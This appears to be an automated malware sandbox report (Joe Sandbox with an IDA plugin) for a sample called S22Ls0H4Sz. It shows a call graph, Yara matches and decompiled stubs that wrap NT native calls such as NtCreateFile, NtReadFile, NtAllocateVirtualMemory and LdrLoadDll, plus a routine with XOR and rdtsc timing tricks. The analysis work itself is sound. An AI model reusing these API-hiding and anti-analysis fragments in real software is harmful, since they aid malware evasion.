39bdb0 2 API calls 
18705->18706 18706->18704 18708 384aad 18707->18708 18709 394a40 6 API calls 18708->18709 18709->18705 18713 392860 18710->18713 18712 38b520 18712->18671 18714 39287c 18713->18714 18715 38ace0 LdrLoadDll 18714->18715 18716 392897 18715->18716 18717 3928a0 18716->18717 18718 394e40 LdrLoadDll 18716->18718 18717->18712 18719 3928b7 18718->18719 18720 394e40 LdrLoadDll 18719->18720 18721 3928cc 18720->18721 18722 394e40 LdrLoadDll 18721->18722 18723 3928df 18722->18723 18724 394e40 LdrLoadDll 18723->18724 18725 3928f2 18724->18725 18726 394e40 LdrLoadDll 18725->18726 18727 392908 18726->18727 18728 394e40 LdrLoadDll 18727->18728 18729 39291b 18728->18729 18730 38ace0 LdrLoadDll 18729->18730 18731 392944 18730->18731 18732 394e40 LdrLoadDll 18731->18732 18741 3929e0 18731->18741 18733 392968 18732->18733 18734 38ace0 LdrLoadDll 18733->18734 18735 39299d 18734->18735 18736 394e40 LdrLoadDll 18735->18736 18735->18741 18737 3929ba 18736->18737 18738 394e40 LdrLoadDll 18737->18738 18739 3929cd 18738->18739 18740 394e40 LdrLoadDll 18739->18740 18740->18741 18741->18712 18743 393d88 18742->18743 18744 38b030 LdrLoadDll 18743->18744 18745 393db7 18744->18745 18746 38cf10 2 API calls 18745->18746 18748 393dea 18746->18748 18747 393df1 18747->18114 18748->18747 18749 38b030 LdrLoadDll 18748->18749 18750 393e19 18749->18750 18751 38b030 LdrLoadDll 18750->18751 18752 393e3d 18751->18752 18753 38cfd0 LdrLoadDll 18752->18753 18754 393e61 18753->18754 18755 393ea3 18754->18755 18906 3936b0 18754->18906 18759 38b030 LdrLoadDll 18755->18759 18757 393e7a 18758 394026 18757->18758 18913 393aa0 18757->18913 18758->18114 18761 393ec3 18759->18761 18762 38cfd0 LdrLoadDll 18761->18762 18763 393ee7 18762->18763 18764 393f2d 18763->18764 18765 393f04 18763->18765 18767 3936b0 6 API calls 18763->18767 18766 38cfd0 LdrLoadDll 18764->18766 18765->18758 18768 393aa0 6 API calls 18765->18768 18769 393f5d 18766->18769 18767->18765 18768->18764 18770 393fa3 18769->18770 18771 393f7a 18769->18771 
18773 3936b0 6 API calls 18769->18773 18774 38cfd0 LdrLoadDll 18770->18774 18771->18758 18772 393aa0 6 API calls 18771->18772 18772->18770 18773->18771 18775 394002 18774->18775 18776 39404b 18775->18776 18777 39401f 18775->18777 18778 3936b0 6 API calls 18775->18778 18776->18114 18777->18758 18779 393aa0 6 API calls 18777->18779 18778->18777 18779->18776 18781 392aa4 18780->18781 18782 38b030 LdrLoadDll 18781->18782 18783 392b71 18782->18783 18784 38cf10 2 API calls 18783->18784 18786 392ba4 18784->18786 18785 392bab 18785->18116 18786->18785 18787 38b030 LdrLoadDll 18786->18787 18788 392bd3 18787->18788 18789 38cfd0 LdrLoadDll 18788->18789 18790 392c13 18789->18790 18791 392d33 18790->18791 18792 3936b0 6 API calls 18790->18792 18791->18116 18793 392c30 18792->18793 18794 392d42 18793->18794 18796 392860 LdrLoadDll 18793->18796 18795 39a480 2 API calls 18794->18795 18797 392d4c 18795->18797 18798 392c48 18796->18798 18797->18116 18798->18794 18799 392c53 18798->18799 18800 39bf80 2 API calls 18799->18800 18801 392c7c 18800->18801 18802 392c9b 18801->18802 18803 392c85 18801->18803 18806 39a190 LdrLoadDll 18802->18806 18804 39a480 2 API calls 18803->18804 18805 392c8f 18804->18805 18805->18116 18811 392cc7 18806->18811 18807 392d22 18808 39a480 2 API calls 18807->18808 18809 392d2c 18808->18809 18812 39bdb0 2 API calls 18809->18812 18811->18807 18813 39a190 LdrLoadDll 18811->18813 18950 392680 18811->18950 18812->18791 18813->18811 18815 390e78 18814->18815 18816 39bf80 2 API calls 18815->18816 18818 390ed8 18816->18818 18817 390ee1 18817->18118 18818->18817 18961 390b20 18818->18961 18820 390f08 18821 390f26 18820->18821 18822 3917b0 7 API calls 18820->18822 18824 38ae30 LdrLoadDll 18821->18824 18826 390f40 18821->18826 18823 390f1a 18822->18823 18825 3917b0 7 API calls 18823->18825 18824->18826 18825->18821 18827 390b20 6 API calls 18826->18827 18828 390f6b 18827->18828 18829 390f8a 18828->18829 18831 3917b0 7 API calls 18828->18831 18830 390fa4 18829->18830 
18833 38ae30 LdrLoadDll 18829->18833 18834 39bdb0 2 API calls 18830->18834 18832 390f7e 18831->18832 18835 3917b0 7 API calls 18832->18835 18833->18830 18836 390fae 18834->18836 18835->18829 18836->18118 18838 391be6 18837->18838 18839 391bf8 18838->18839 18840 391c7e 18838->18840 18842 38b030 LdrLoadDll 18839->18842 18841 391c5c 18840->18841 18843 392d80 6 API calls 18840->18843 18848 391c76 18841->18848 19033 3988c0 18841->19033 18844 391c09 18842->18844 18843->18841 18846 391c27 18844->18846 18849 38b030 LdrLoadDll 18844->18849 18852 38b030 LdrLoadDll 18846->18852 18847 391cbb 18850 391d10 18847->18850 18851 391370 6 API calls 18847->18851 18848->18120 18849->18846 18850->18120 18853 391cd3 18851->18853 18854 391c4b 18852->18854 18855 391cda 18853->18855 18856 391d1c 18853->18856 18857 394a40 6 API calls 18854->18857 18858 391cff 18855->18858 18859 391ce2 18855->18859 18860 38b030 LdrLoadDll 18856->18860 18857->18841 18862 39bdb0 2 API calls 18858->18862 18861 39bdb0 2 API calls 18859->18861 18863 391d2d 18860->18863 18864 391cf3 18861->18864 18862->18850 18865 390fd0 6 API calls 18863->18865 18864->18120 18869 391d47 18865->18869 18866 391e2f 18867 39bdb0 2 API calls 18866->18867 18868 391e36 18867->18868 18868->18120 18869->18866 18870 3916e0 7 API calls 18869->18870 18870->18869 18872 391bc0 7 API calls 18871->18872 18873 392d71 18872->18873 18873->18122 18875 3933ed 18874->18875 18876 38ace0 LdrLoadDll 18875->18876 18877 393408 18876->18877 18878 394e40 LdrLoadDll 18877->18878 18898 38efc3 18877->18898 18879 393432 18878->18879 18880 394e40 LdrLoadDll 18879->18880 18881 393445 18880->18881 18882 394e40 LdrLoadDll 18881->18882 18883 393458 18882->18883 18884 394e40 LdrLoadDll 18883->18884 18885 39346b 18884->18885 18886 394e40 LdrLoadDll 18885->18886 18887 393481 18886->18887 18888 394e40 LdrLoadDll 18887->18888 18889 393494 18888->18889 18890 394e40 LdrLoadDll 18889->18890 18891 3934a7 18890->18891 18892 394e40 LdrLoadDll 18891->18892 18893 3934ba 
18892->18893 18894 394e40 LdrLoadDll 18893->18894 18895 3934cf 18894->18895 18896 3936b0 6 API calls 18895->18896 18895->18898 18897 393551 18896->18897 18897->18898 19059 392f90 18897->19059 18900 3960d0 18898->18900 18901 396128 18900->18901 18903 38efcf 18901->18903 19064 395d30 18901->19064 18903->18083 18904 396193 18904->18903 19102 395fe0 18904->19102 18908 393725 18906->18908 18907 3938b2 18907->18757 18908->18907 18909 394a40 6 API calls 18908->18909 18910 393892 18909->18910 18910->18907 18911 394a40 6 API calls 18910->18911 18912 3938a3 18911->18912 18912->18757 18914 393acd 18913->18914 18924 39a150 18914->18924 18916 393d4f 18916->18755 18917 38cfd0 LdrLoadDll 18919 393aec 18917->18919 18918 39a150 LdrLoadDll 18918->18919 18919->18916 18919->18917 18919->18918 18921 394a40 6 API calls 18919->18921 18922 39a190 LdrLoadDll 18919->18922 18923 39a480 LdrLoadDll NtClose 18919->18923 18927 3938c0 18919->18927 18921->18919 18922->18919 18923->18919 18925 39af50 LdrLoadDll 18924->18925 18926 39a16c 18925->18926 18926->18919 18928 39397f 18927->18928 18929 394a40 6 API calls 18928->18929 18930 3939a4 18929->18930 18931 3939ad 18930->18931 18933 3939dd 18930->18933 18938 39c000 18931->18938 18935 3939c4 18933->18935 18942 393600 18933->18942 18936 394a40 6 API calls 18935->18936 18937 393a8a 18936->18937 18937->18919 18939 39c00d 18938->18939 18940 394e40 LdrLoadDll 18939->18940 18941 39c020 18940->18941 18941->18935 18943 39369f 18942->18943 18944 393612 18942->18944 18943->18935 18945 38ace0 LdrLoadDll 18944->18945 18946 39364c 18945->18946 18946->18943 18947 394e40 LdrLoadDll 18946->18947 18948 393669 18947->18948 18948->18943 18949 39bdb0 2 API calls 18948->18949 18949->18943 18952 3926a9 18950->18952 18951 39271a 18951->18811 18952->18951 18955 3923a0 18952->18955 18960 3923c5 18955->18960 18956 392673 18956->18811 18957 39bdb0 2 API calls 18958 392665 18957->18958 18959 394a40 6 API calls 18958->18959 18959->18956 18960->18956 18960->18957 18962 390bb8 

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 39a400-39a449 call 39af50 NtReadFile
                            C-Code - Quality: 37%
                            			E0039A400(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                            				intOrPtr _t16;
                            				void* _t18;
                            				intOrPtr _t21;
                            				intOrPtr _t25;
                            				void* _t27;
                            				intOrPtr* _t28;
                            
                            				_t13 = _a4;
                            				_t28 = _a4 + 0xc48;
                            				E0039AF50(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                            				_t4 =  &_a40; // 0x394a21
                            				_t6 =  &_a32; // 0x394d62
                            				_t16 = _a24;
                            				_t21 = _a20;
                            				_t25 = _a16;
                            				_t12 =  &_a8; // 0x394d62
                            				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _t25, _t21, _t16, _a28,  *_t6, _a36,  *_t4); // executed
                            				return _t18;
                            			}










                            APIs
                            • NtReadFile.NTDLL(bM9,5EB65239,FFFFFFFF,?,?,?,bM9,?,!J9,FFFFFFFF,5EB65239,00394D62,?,00000000), ref: 0039A445
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: !J9$bM9$bM9
                            • API String ID: 2738559852-665611353
                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction ID: df5e2c451d95a055af69c24c749c64e5c70e0c90b66328c76118250a6084b5e0
                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction Fuzzy Hash: 7BF0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4 39a44a-39a44e 5 39a438-39a449 NtReadFile 4->5 6 39a450-39a479 call 39af50 4->6
                            APIs
                            • NtReadFile.NTDLL(bM9,5EB65239,FFFFFFFF,?,?,?,bM9,?,!J9,FFFFFFFF,5EB65239,00394D62,?,00000000), ref: 0039A445
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: bM9
                            • API String ID: 2738559852-2931851036
                            • Opcode ID: e8025a22b873f44e3f034a7fe280a81c12f1319611fdee8162e5b0f901dcc224
                            • Instruction ID: 431e4dcf8082dfdbdcf6f92ca2c5a6f1d40d456a5d88c4a1337536664d257a11
                            • Opcode Fuzzy Hash: e8025a22b873f44e3f034a7fe280a81c12f1319611fdee8162e5b0f901dcc224
                            • Instruction Fuzzy Hash: CBF01CB62402146BDB14EFA9DC94EA7B3ACEF88760F058959FA1C97241C531E90087A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 238 38ace0-38ad09 call 39cc40 241 38ad0b-38ad0e 238->241 242 38ad0f-38ad1d call 39d060 238->242 245 38ad2d-38ad3e call 39b490 242->245 246 38ad1f-38ad2a call 39d2e0 242->246 251 38ad40-38ad54 LdrLoadDll 245->251 252 38ad57-38ad5a 245->252 246->245 251->252
                            C-Code - Quality: 100%
                            			E0038ACE0(void* __eflags, void* _a4, intOrPtr _a8) {
                            				char* _v8;
                            				struct _EXCEPTION_RECORD _v12;
                            				struct _OBJDIR_INFORMATION _v16;
                            				char _v536;
                            				void* _t15;
                            				struct _OBJDIR_INFORMATION _t17;
                            				struct _OBJDIR_INFORMATION _t18;
                            				void* _t30;
                            				void* _t31;
                            				void* _t32;
                            
                            				_v8 =  &_v536;
                            				_t15 = E0039CC40( &_v12, 0x104, _a8);
                            				_t31 = _t30 + 0xc;
                            				if(_t15 != 0) {
                            					_t17 = E0039D060(__eflags, _v8);
                            					_t32 = _t31 + 4;
                            					__eflags = _t17;
                            					if(_t17 != 0) {
                            						E0039D2E0( &_v12, 0);
                            						_t32 = _t32 + 8;
                            					}
                            					_t18 = E0039B490(_v8);
                            					_v16 = _t18;
                            					__eflags = _t18;
                            					if(_t18 == 0) {
                            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                            						return _v16;
                            					}
                            					return _t18;
                            				} else {
                            					return _t15;
                            				}
                            			}














                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0038AD52
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                            • Instruction ID: 1e10a7d68ec37dd2cc8f6212697097e4a81116025da038ce6b28eafcaf2848df
                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                            • Instruction Fuzzy Hash: 6A0171B5D4020DABDF10EBE4DD42FDDB3789B14308F0041A5E9089B241F670EB18CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 253 39a34a-39a366 254 39a36c-39a3a1 NtCreateFile 253->254 255 39a367 call 39af50 253->255 255->254
                            C-Code - Quality: 82%
                            			E0039A34A(void* __esi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                            				long _t23;
                            				void* _t34;
                            				signed int _t41;
                            
                            				 *(__esi - 0x74aa33d5) =  *(__esi - 0x74aa33d5) & _t41;
                            				_t17 = _a4;
                            				_push(__esi);
                            				_t5 = _t17 + 0xc40; // 0xc40
                            				E0039AF50(_t34, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                            				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                            				return _t23;
                            			}







                            APIs
                            • NtCreateFile.NTDLL(00000060,00389CE3,?,00394BA7,00389CE3,FFFFFFFF,?,?,FFFFFFFF,00389CE3,00394BA7,?,00389CE3,00000060,00000000,00000000), ref: 0039A39D
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 0b9140038fb50e217118b7360b882c107a71e661250b2a42a44d2c7968539bc5
                            • Instruction ID: f5715b5a96df7eb4482c36df335b028b52abb0e68cbbd34aea3b838f3c37680f
                            • Opcode Fuzzy Hash: 0b9140038fb50e217118b7360b882c107a71e661250b2a42a44d2c7968539bc5
                            • Instruction Fuzzy Hash: 6C01ABB2601508AFDB08CF88DC95EEB77A9AF8C354F158648FA1D97240CA30E8118BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 256 39a350-39a3a1 call 39af50 NtCreateFile
                            C-Code - Quality: 100%
                            			E0039A350(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                            				long _t21;
                            				void* _t31;
                            
                            				_t3 = _a4 + 0xc40; // 0xc40
                            				E0039AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                            				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                            				return _t21;
                            			}






                            APIs
                            • NtCreateFile.NTDLL(00000060,00389CE3,?,00394BA7,00389CE3,FFFFFFFF,?,?,FFFFFFFF,00389CE3,00394BA7,?,00389CE3,00000060,00000000,00000000), ref: 0039A39D
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction ID: fe4f6d914fdade86bb29c7b30278f97c5808b37289dfb7831a3e62aeefb75fdc
                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction Fuzzy Hash: 10F0BDB2200208AFCB08CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 259 39a530-39a56d call 39af50 NtAllocateVirtualMemory
                            C-Code - Quality: 100%
                            			E0039A530(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                            				long _t14;
                            				void* _t21;
                            
                            				_t3 = _a4 + 0xc60; // 0xca0
                            				E0039AF50(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                            				return _t14;
                            			}






                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0039B124,?,00000000,?,00003000,00000040,00000000,00000000,00389CE3), ref: 0039A569
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction ID: 5ea3e5ae9ccac237e1e3ceffd977f63cf2f61c9ab25646ed6de16673e3a9067e
                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction Fuzzy Hash: 3EF015B2200208AFCB14DF89CC81EAB77ADAF88754F118248BE1D97241C630F810CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 269 39a47a-39a4a9 call 39af50 NtClose
                            C-Code - Quality: 82%
                            			E0039A47A(intOrPtr _a8, void* _a12) {
                            				void* _v117;
                            				long _t9;
                            				void* _t14;
                            
                            				asm("sbb edi, [ebx]");
                            				_t6 = _a8;
                            				_t3 = _t6 + 0x10; // 0x300
                            				_t4 = _t6 + 0xc50; // 0x38a933
                            				E0039AF50(_t14, _a8, _t4,  *_t3, 0, 0x2c);
                            				_t9 = NtClose(_a12); // executed
                            				return _t9;
                            			}







                            APIs
                            • NtClose.NTDLL(00394D40,?,?,00394D40,00389CE3,FFFFFFFF), ref: 0039A4A5
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: c50802a4f6446ea83c9a177f86bb7d3df0e22652f8a72a5254dc4f60f81f27af
                            • Instruction ID: 9265aeacfb2ada51ac33217d69562fec9294723711a3bf0c1469fd30f0bf7369
                            • Opcode Fuzzy Hash: c50802a4f6446ea83c9a177f86bb7d3df0e22652f8a72a5254dc4f60f81f27af
                            • Instruction Fuzzy Hash: 0DE08C76200514AFDB20DFA8CC86EEB7B69EF49350F154199FA9DAB342C630A505CBD0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 272 39a480-39a496 273 39a49c-39a4a9 NtClose 272->273 274 39a497 call 39af50 272->274 274->273
                            C-Code - Quality: 100%
                            			E0039A480(intOrPtr _a4, void* _a8) {
                            				long _t8;
                            				void* _t11;
                            
                            				_t5 = _a4;
                            				_t2 = _t5 + 0x10; // 0x300
                            				_t3 = _t5 + 0xc50; // 0x38a933
                            				E0039AF50(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                            				_t8 = NtClose(_a8); // executed
                            				return _t8;
                            			}






                            APIs
                            • NtClose.NTDLL(00394D40,?,?,00394D40,00389CE3,FFFFFFFF), ref: 0039A4A5
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction ID: e5e08124ce8352d6122502751bdcd59795e5c84835fd9a9bc716a9c23b2673a8
                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction Fuzzy Hash: B4D01776200214ABDB10EB98CC85EA77BACEF48760F154599BA1D9B242C530FA0086E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E00389AA0(intOrPtr* _a4) {
                            				intOrPtr _v8;
                            				char _v24;
                            				char _v284;
                            				char _v804;
                            				char _v840;
                            				void* _t24;
                            				void* _t31;
                            				void* _t33;
                            				void* _t34;
                            				void* _t39;
                            				void* _t50;
                            				intOrPtr* _t52;
                            				void* _t53;
                            				void* _t54;
                            				void* _t55;
                            				void* _t56;
                            
                            				_t52 = _a4;
                            				_t39 = 0; // executed
                            				_t24 = E00387EA0(_t52,  &_v24); // executed
                            				_t54 = _t53 + 8;
                            				if(_t24 != 0) {
                            					E003880B0( &_v24,  &_v840);
                            					_t55 = _t54 + 8;
                            					do {
                            						E0039BE00( &_v284, 0x104);
                            						E0039C470( &_v284,  &_v804);
                            						_t56 = _t55 + 0x10;
                            						_t50 = 0x4f;
                            						while(1) {
                            							_t31 = E00394DE0(E00394D80(_t52, _t50),  &_v284);
                            							_t56 = _t56 + 0x10;
                            							if(_t31 != 0) {
                            								break;
                            							}
                            							_t50 = _t50 + 1;
                            							if(_t50 <= 0x62) {
                            								continue;
                            							} else {
                            							}
                            							goto L8;
                            						}
                            						_t9 = _t52 + 0x14; // 0xffffe055
                            						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                            						_t39 = 1;
                            						L8:
                            						_t33 = E003880E0( &_v24,  &_v840);
                            						_t55 = _t56 + 8;
                            					} while (_t33 != 0 && _t39 == 0);
                            					_t34 = E00388160(_t52,  &_v24); // executed
                            					if(_t39 == 0) {
                            						asm("rdtsc");
                            						asm("rdtsc");
                            						_v8 = _t34 - 0 + _t34;
                            						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                            					}
                            					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                            					_t20 = _t52 + 0x31; // 0x5608758b
                            					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                            					return 1;
                            				} else {
                            					return _t24;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                            • Instruction ID: 849649d89e001f4b4e7c1eb905cbf01264d12a1854954f447053fb66e89bfc4a
                            • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                            • Instruction Fuzzy Hash: EE21F8B2D443185BCB27E664AD52BFF73ACAB54304F4800EEE94997142F634AA0987A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 10 39a620-39a651 call 39af50 RtlAllocateHeap
                            C-Code - Quality: 100%
                            			E0039A620(intOrPtr _a4, char _a8, long _a12, long _a16) {
                            				void* _t10;
                            				void* _t15;
                            
                            				E0039AF50(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                            				_t6 =  &_a8; // 0x394526
                            				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                            				return _t10;
                            			}

                            APIs
                            • RtlAllocateHeap.NTDLL(&E9,?,00394C9F,00394C9F,?,00394526,?,?,?,?,?,00000000,00389CE3,?), ref: 0039A64D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
